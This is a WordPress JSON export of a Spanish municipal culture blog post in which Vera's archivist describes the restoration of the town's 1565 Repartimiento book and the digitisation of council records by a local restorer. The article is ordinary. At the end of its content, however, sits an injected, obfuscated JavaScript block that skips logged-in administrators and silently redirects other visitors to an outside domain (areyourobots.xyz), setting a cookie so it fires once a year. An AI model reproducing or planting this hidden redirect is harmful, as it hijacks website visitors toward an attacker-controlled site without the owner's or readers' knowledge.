{"id":1901,"date":"2016-04-19T20:05:34","date_gmt":"2016-04-19T20:05:34","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=1901"},"modified":"2016-04-19T20:05:34","modified_gmt":"2016-04-19T20:05:34","slug":"restauracion-de-documentos-del-archivo-municipal-de-vera-cruz-ramos-martinez","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/04\/19\/restauracion-de-documentos-del-archivo-municipal-de-vera-cruz-ramos-martinez\/","title":{"rendered":"RESTAURACI\u00d3N DE DOCUMENTOS DEL ARCHIVO MUNICIPAL DE VERA. CRUZ RAMOS MART\u00cdNEZ"},"content":{"rendered":"<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">Se describe el proceso de restauraci\u00f3n de documentos del Archivo Municipal de Vera por la restauradora almeriense Cruz Ramos Mart\u00ednez, de la empresa MINIUM.<\/span><\/span><\/p>\n<p align=\"justify\"><!--more--><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">El patrimonio documental espa\u00f1ol suele conservarse en papel. Este <b>soporte<\/b>, como ocurre con toda la materia org\u00e1nica, se comporta como un ser vivo, produciendo el tiempo sobre \u00e9l los estragos de sobra conocidos por los mortales. Un ambiente estable dentro de los dep\u00f3sitos documentales, con el mantenimiento de unos niveles de <b>humedad<\/b> relativa del 45% y de <b>temperatura<\/b> no superiores a 20\u00baC, equivaldr\u00e1n a una mejor conservaci\u00f3n del papel y a frenar su inevitable deterioro. Cuando, habiendo puesto esos medios para mejor conservar el papel no ha sido suficiente, en el caso de que los documentos sean muy antiguos o las <b>tintas ferrog\u00e1licas<\/b> est\u00e9n destruyendo el documento d\u00e9cada a d\u00e9cada, la \u00faltima y \u00fanica soluci\u00f3n es la estabilizaci\u00f3n del documento por medio de ligeros tratamientos sobre el papel o la restauraci\u00f3n parcial o total del mismo.<\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/Copia-de-dep\u00f3sito.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-1910\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/Copia-de-dep\u00f3sito-225x300.jpg\" alt=\"Copia de dep\u00f3sito\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/Copia-de-dep\u00f3sito-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/Copia-de-dep\u00f3sito.jpg 567w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">En el Archivo Municipal de Vera se custodian documentos con fechas desde <b>1493<\/b>. A pesar de su gran antig\u00fcedad esos documentos, por lo general, disfrutan de una buena salud, no observ\u00e1ndose en su superficie hongos ni ataques de agentes bibli\u00f3fagos. Tambi\u00e9n la <b>rara sensibilidad<\/b> de las autoridades veratenses desde siempre hacia la conservaci\u00f3n de estos documentos ha hecho que en el Municipio se disfrute hoy de uno de los Archivos Locales m\u00e1s interesantes del Suroeste peninsular. A\u00fan as\u00ed, hay documentos que necesitan un ligero tratamiento para ser estabilizados. Un ejemplo de ello lo encontramos en los valiosos Libros de Actas Capitulares de Vera, los Padrones de Bulas, etc. <\/span><\/span><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">Uno de los pocos documentos que necesitaban una restauraci\u00f3n urgent\u00edsima era el libro de <b>Repartimiento de Vera<\/b>. Fue localizado por Mar\u00eda Luisa Andr\u00e9s Uroz (archivera desde 1983 hasta 2003) y gracias a su descubrimiento, Juan Francisco Jim\u00e9nez Alc\u00e1zar, profesor de Historia Medieval de la Universidad de Murcia, pudo transcribir su contenido y dar a conocer los primeros cap\u00edtulos de la Vera cristiana desde 1488. El estado f\u00edsico del documento era lamentable: una gran agujero de m\u00e1s de 3 cent\u00edmetros era bien observable en medio de todos sus folios. Adem\u00e1s, las tintas ferrog\u00e1licas los hab\u00edan perforado en algunas partes y el mismo papel, al haber sido, aparentemente, empapado con agua, en fecha desconocida, y no haberse secado convenientemente, se deshac\u00eda nada m\u00e1s tocarlo.<\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repart-antes-restauraci\u00f3n-1.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1913\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repart-antes-restauraci\u00f3n-1-225x300.jpg\" alt=\"libro repart antes restauraci\u00f3n 1\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repart-antes-restauraci\u00f3n-1-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repart-antes-restauraci\u00f3n-1-768x1024.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repart-antes-restauraci\u00f3n-1.jpg 1944w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repartim-antes-restauraci\u00f3n-fol-47.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-1914\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repartim-antes-restauraci\u00f3n-fol-47-225x300.jpg\" alt=\"libro repartim antes restauraci\u00f3n fol 47\" width=\"225\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repartim-antes-restauraci\u00f3n-fol-47-225x300.jpg 225w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repartim-antes-restauraci\u00f3n-fol-47-768x1024.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/libro-repartim-antes-restauraci\u00f3n-fol-47.jpg 1944w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/reparti-primer-folio.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1915\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/reparti-primer-folio-300x224.jpg\" alt=\"reparti primer folio\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/reparti-primer-folio-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/reparti-primer-folio.jpg 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/repartim-pasando-p\u00e1gina-47.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1916\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/repartim-pasando-p\u00e1gina-47-300x224.jpg\" alt=\"repartim pasando p\u00e1gina 47\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/repartim-pasando-p\u00e1gina-47-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/repartim-pasando-p\u00e1gina-47-1024x765.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/repartim-pasando-p\u00e1gina-47.jpg 1134w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">Nuestro libro lleva la fecha de <b>1565<\/b> y es una copia original del Repartimiento que se redact\u00f3 en Vera en el a\u00f1o <b>1494<\/b>. De ah\u00ed su gran valor. En \u00e9l se describe c\u00f3mo se repartieron las tierras conquistadas a los musulmanes entre los cristianos, soldados colonos que llegaron desde otros lugares hasta Vera para repoblarla. En \u00e9l aparecen los <b>nombres de los primeros veratenses<\/b> y las suertes que se les entregaron.<\/span><\/span><\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1906\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/4-300x224.jpg\" alt=\"4\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/4-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/4-1024x765.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"justify\"><span style=\"color: #000000\"><span style=\"font-size: large\">Al ser este libro un documento constitutivo esencial e importante para el Municipio, se aprovech\u00f3 la \u00faltima subvenci\u00f3n concedida que la Junta de Andaluc\u00eda ofreci\u00f3 a los Archivos Locales, all\u00e1 por el a\u00f1o 2008. El precio de la restauraci\u00f3n fue de 4000 \u20ac y su estado f\u00edsico fue descrito como de \u00abnivel de deterioro extremo\u00bb. La empresa de restauraci\u00f3n y digitalizaci\u00f3n de documentos que realiz\u00f3 el trabajo fue <b>MINIUM<\/b> (Almer\u00eda), cuya responsable y gran profesional, <b>Cruz Ramos Mart\u00ednez<\/b>, trabaj\u00f3 en su restauraci\u00f3n siguiendo el esquema de tratamiento que se describe:<\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Limpieza mec\u00e1nica y qu\u00edmica<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Tratamiento contra microorganismos<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Desacidificaci\u00f3n<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Reintegraci\u00f3n estructural<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Laminaci\u00f3n reversible<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">-Consolidaci\u00f3n<\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">El resultado final del trabajo, como puede observarse en las fotograf\u00edas, es excelente. El tratamiento definitivo permitir\u00e1 que este valioso documento de Vera puede seguir siendo disfrutado por vecinos del Municipio y por otros interesados que quieran seguir acerc\u00e1ndose al Archivo Municipal.<\/span><\/span><\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1904\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/2-300x224.jpg\" alt=\"2\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/2-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/2-1024x765.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1903\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/1-224x300.jpg\" alt=\"1\" width=\"224\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/1-224x300.jpg 224w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/1-765x1024.jpg 765w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/1.jpg 1936w\" sizes=\"(max-width: 224px) 100vw, 224px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1907\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/5-224x300.jpg\" alt=\"5\" width=\"224\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/5-224x300.jpg 224w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/5-765x1024.jpg 765w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/5.jpg 1936w\" sizes=\"(max-width: 224px) 100vw, 224px\" \/><\/a><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Otra parte de la subvenci\u00f3n fue destinada a la <b>digitalizaci\u00f3n<\/b> de algunos libros de Pleno, labor que tambi\u00e9n realiz\u00f3 Cruz Ramos (est\u00e1n colgados a disposici\u00f3n de los interesados en la web del Ayuntamiento de Vera (vera.es) y de manera gratuita para su consulta). Su gran generosidad permiti\u00f3 que, aunque no entraba en el precio del dinero concedido, aprovechando que deb\u00eda analizar folio a folio dichos libros para ser fotografiados, y tras comprobar que algunos de ellos se encontraban en muy mal estado, de manera totalmente desinteresada, <b>consolid\u00f3<\/b> los folios que estaban m\u00e1s deteriorados mediante la <b>reintegraci\u00f3n estructural con celulosa<\/b>. De no haberlo hecho as\u00ed, en un futuro no muy lejano habr\u00eda sido imposible leer siquiera los textos escritos en ellos porque se habr\u00edan \u00abdesintegrado\u00bb entre nuestros dedos. A todos los documentos tratados les a\u00f1adi\u00f3 una caja de conservaci\u00f3n de ph neutro; impiden que la acidez de otro material acidifique el papel.<\/span><\/span><\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/actas-cap-detalle.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1917\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/actas-cap-detalle-300x224.jpg\" alt=\"actas cap detalle\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/actas-cap-detalle-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/actas-cap-detalle.jpg 850w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Agradecemos desde aqu\u00ed a la restauradora Cruz su gran sensibilidad mostrada por nuestra historia. <\/span><\/span><\/span><\/p>\n<p><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Las fotos adjuntas se realizaron en diciembre de 2015 en el Archivo Municipal de Vera.<\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Vera, 05 de febrero de 2016<\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Manuel Caparr\u00f3s Perales<\/span><\/span><\/span><\/p>\n<p align=\"right\"><span style=\"color: #000000\"><span style=\"font-family: Times New Roman,serif\"><span style=\"font-size: large\">Archivero Municipal de Vera<\/span><\/span><\/span><\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se describe el proceso de restauraci\u00f3n de documentos del Archivo Municipal de Vera por la restauradora almeriense Cruz Ramos Mart\u00ednez, de la empresa MINIUM.<\/p>\n","protected":false},"author":7,"featured_media":1902,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,110],"tags":[140,141],"class_list":["post-1901","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","category-arte-artesania","tag-cruz-ramos-martinez","tag-restauracion"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=1901"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1901\/revisions"}],"predecessor-version":[{"id":1919,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/1901\/revisions\/1919"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/1902"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=1901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=1901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=1901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}